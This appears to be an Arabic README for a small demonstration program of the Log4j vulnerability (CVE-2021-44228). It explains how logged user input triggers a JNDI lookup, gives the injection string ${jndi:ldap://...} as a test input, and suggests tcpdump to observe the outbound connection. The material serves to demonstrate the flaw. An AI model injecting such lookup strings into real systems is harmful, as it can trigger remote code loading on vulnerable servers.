
برنامج بسيط لتوضيح كيفية استغلال ثغرة Log4j ( CVE-2021-44228 )
برنامج بسيط لتوضيح كيفية استغلال ثغرة Log4j ( CVE-2021-44228 )
لتشغيل البرنامج، ما عليك سوى تشغيل start.sh (على أنظمة UNIX) أو start.bat على نظام Windows.
سيتم قراءة إدخال المستخدم وتسجيله في وحدة التحكم باستخدام إطار عمل Log4j.
بشكل افتراضي، لا توفر رسائل التسجيل التي ينشئها مكتبة Log4j أي أخطاء مثل "الخادم غير قابل للوصول" أو "المضيف غير موجود" لاستبدالات JNDI. (وأعتقد أن هذا أيضًا سبب رئيسي يجعل هذه الثغرة قابلة للاستغلال بشكل خفي)
جرّب أيضًا استخدام نطاقات فرعية، مثل ${jndi:ldap://test29.google.com/blah} ، ففي بعض الأحيان سينتظر استدعاء JNDI استجابة من الخادم البعيد، ولهذا يبدو البرنامج وكأنه عالق بينما قام فعليًا بمحاولة اتصال في الخلفية. إذا استخدمت نطاقات فرعية غير موجودة، فسينتهي استدعاء JNDI بسرعة بعد محاولة الاتصال وسيستمر البرنامج.
أنصحك بتشغيل البرنامج في نافذة طرفية واحدة، وتشغيل الأمر " tcpdump -i any | grep google " في نافذة أخرى بالتوازي، ثم تقديم مدخلات للبرنامج لمعرفة ما إذا كان البرنامج قد قام بمحاولة اتصال.



testing ( سلسلة نصية عادية )
--
--
--